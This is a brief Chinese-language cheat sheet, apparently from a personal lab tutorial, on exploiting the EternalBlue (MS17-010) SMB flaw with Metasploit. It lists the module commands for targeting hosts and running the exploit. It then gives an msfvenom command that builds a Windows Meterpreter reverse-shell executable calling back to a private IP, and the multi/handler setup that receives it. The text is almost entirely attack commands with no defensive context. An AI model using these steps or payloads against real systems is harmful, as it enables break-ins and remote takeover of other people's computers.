文章目录
- 永恒之蓝
- 下载
- msfconsole
- msfvenom
永恒之蓝
下载
msdn.itellyou.cn
msfconsole
M e t a s p l o i t C y b e r M i s s i l e C o m m a n d Metasploit Cyber Missile Command MetasploitCyberMissileCommand 的简称
search ms17_010
use 0 或者 use exploit/windows/smb/ms17_010_eternalblue
show options 或者options
ping [ip..]
set RHOSTS [ip..]
set lport 60000 # 可选 设置端口
run
msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.124 lport=9999 -f exe -o demo.exe
----------------------
use 0
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.31.44
set lport 9999